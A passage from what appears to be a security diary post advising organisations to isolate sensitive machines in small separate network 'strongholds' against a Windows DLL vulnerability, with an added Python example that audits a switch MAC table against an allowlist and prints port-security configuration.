  • Now no surfing, no email, ... etc can be hard on the users and they might have really good arguments to have the functionality back.
    • Build a second less sensitive network on different infrastructure
    • Add machines for those that need the web/email/...
    • Allow them to surf the web (with traditional restrictions) on those "less" secure machines, but not on the "sensitive" machines, which are to be used exclusively for their sensitive application(s).
    • If you want to allow transfers between the two environments, be very procedural about it and build the needed infrastructure.
  • The more traditional stuff should not be forgotten, especially not on the more secure side:
    • Take a tough stance on updating anti-virus signatures
    • Look at unregistering the DLL as per Microsoft's suggestion
    • Maybe consider an unofficial patch from a reputable source
  • Look for other platforms
    • This is hard, as training users to switch platforms takes time and, worse, applications might not have properly working clients for other platforms. Still, it's one way out of the de facto monoculture of operating systems and their related vulnerabilities. We know from agriculture that monoculture has risks. If we do not want to accept those risks, we need to act on it as well.
  • Look for other strongholds to build
    • If you have more than one sensitive section in your company, build more of these strongholds; do not build larger ones.
    • More, smaller strongholds contain the spread of infections better and keep the associated risks and clean-up costs under control.
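The layer 2 measures listed above (one MAC per port, only known MACs on the sensitive segment) are only worth something if you verify them. The following is an added example, not code from the original diary: a small Python audit that parses a MAC address table dump, compares it with an allowlist of the accounting hosts, and flags unknown addresses, hosts that moved port, and ports that learned more than one address. It also emits the matching per-port port-security configuration. The allowlist, the host names and the table dump are constructed for the example; the output is in Cisco IOS syntax, which is an assumption you should verify against your own switch.

```python
"""Audit a 'stronghold' segment against its MAC allowlist (constructed example)."""
import re
from collections import defaultdict

# Hypothetical allowlist for the accounting segment: MAC -> (host, expected port).
KNOWN_HOSTS = {
    "00:11:22:33:44:01": ("acct-ws-01", "Fa0/1"),
    "00:11:22:33:44:02": ("acct-ws-02", "Fa0/2"),
    "00:11:22:33:44:10": ("acct-srv-01", "Fa0/10"),
}

# Constructed dump in the style of 'show mac address-table'; not taken from a real switch.
# Fa0/2 learned a second address, acct-srv-01 moved to Fa0/11, Fa0/3 carries a stranger.
MAC_TABLE = """\
Vlan    Mac Address       Type        Ports
----    -----------       --------    -----
  20    0011.2233.4401    DYNAMIC     Fa0/1
  20    0011.2233.4402    DYNAMIC     Fa0/2
  20    0011.2233.4410    DYNAMIC     Fa0/11
  20    0011.2233.44aa    DYNAMIC     Fa0/2
  20    0011.2233.44bb    DYNAMIC     Fa0/3
"""


def normalize_mac(mac):
    """Accept 0011.2233.4401, 00-11-22-33-44-01 or 00:11:22:33:44:01; return colon form."""
    hexdigits = re.sub(r"[^0-9a-fA-F]", "", mac).lower()
    if len(hexdigits) != 12:
        raise ValueError("not a MAC address: %r" % mac)
    return ":".join(hexdigits[i:i + 2] for i in range(0, 12, 2))


def parse_mac_table(text):
    """Return a list of (vlan, mac, port) tuples; header and separator lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = re.match(r"\s*(\d+)\s+([0-9a-fA-F.]+)\s+\S+\s+(\S+)\s*$", line)
        if m:
            rows.append((int(m.group(1)), normalize_mac(m.group(2)), m.group(3)))
    return rows


def audit(rows, known):
    """Compare learned addresses with the allowlist and report the three violations we care about."""
    unknown, misplaced = [], []
    per_port = defaultdict(set)
    for _vlan, mac, port in rows:
        per_port[port].add(mac)
        if mac not in known:
            unknown.append((mac, port))            # not on the allowlist at all
        elif known[mac][1] != port:
            misplaced.append((mac, known[mac][1], port))  # known host, wrong port
    # A port that learned two addresses is exactly what port-security should have shut down.
    multi = {p: sorted(macs) for p, macs in per_port.items() if len(macs) > 1}
    return {"unknown": unknown, "misplaced": misplaced, "multi_mac_ports": multi}


def ios_port_security(known):
    """Per-port config pinning one known MAC and shutting the port on a second one.
    Cisco IOS syntax is assumed here; check the commands against your own switch."""
    lines = []
    for mac, (host, port) in sorted(known.items(), key=lambda kv: kv[1][1]):
        raw = mac.replace(":", "")
        dotted = ".".join(raw[i:i + 4] for i in range(0, 12, 4))
        lines += [
            "interface %s" % port,
            " description %s" % host,
            " switchport port-security",
            " switchport port-security maximum 1",
            " switchport port-security violation shutdown",
            " switchport port-security mac-address %s" % dotted,
        ]
    return lines


if __name__ == "__main__":
    findings = audit(parse_mac_table(MAC_TABLE), KNOWN_HOSTS)
    for kind, items in findings.items():
        print("%s: %s" % (kind, items))
    print("\n".join(ios_port_security(KNOWN_HOSTS)))
```

Run against the constructed dump, the audit reports two unknown addresses, one known host seen on the wrong port, and Fa0/2 as a port that learned two addresses. The same allowlist can drive the DHCP side of the measures above (fixed reservations per known MAC, with unknown clients denied), so that one list is the single source of truth for what is allowed on the segment.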
So basically I'm back to a defense-in-depth approach which, compared to medieval defenses, is the equivalent of not trying to build a city with a huge wall around it (too much of a hassle and too costly), but instead building a city with a somewhat flimsy wooden palisade and, for the few nobles we have, a big sturdy donjon to protect them, even at the cost of some discomfort in the process.
Add to that that each family of nobles gets its own donjon, so as not to risk all the nobles being wiped out in one go should disease strike the city.

UPDATE: We received some suggestions that are far less extreme than what is above. However, I feel it is hard to actually recommend any of them, as the protection they might give carries a huge risk of a false sense of security. Yet for some organisations it might be what does the trick ...
  • Allowing only non-Windows machines to access the Internet was suggested as an approach. While it might protect that machine, the downloaded files might easily migrate to the Windows machines and as such be a risk regardless. Also, users might find a way to tunnel through the allowed machines. But as always it gives something, and for some environments it might help to mitigate the risk.
  • Using remote display clients from a Windows desktop to a Unix server was suggested. While it might work, again some of the tools have file transfer capabilities and/or accelerate the display by using the graphical power of the workstation. You will never be sure the Windows machines are fully secure. But it might help in some environments to mitigate some of the risk, without giving much assurance.
Swa Frantzen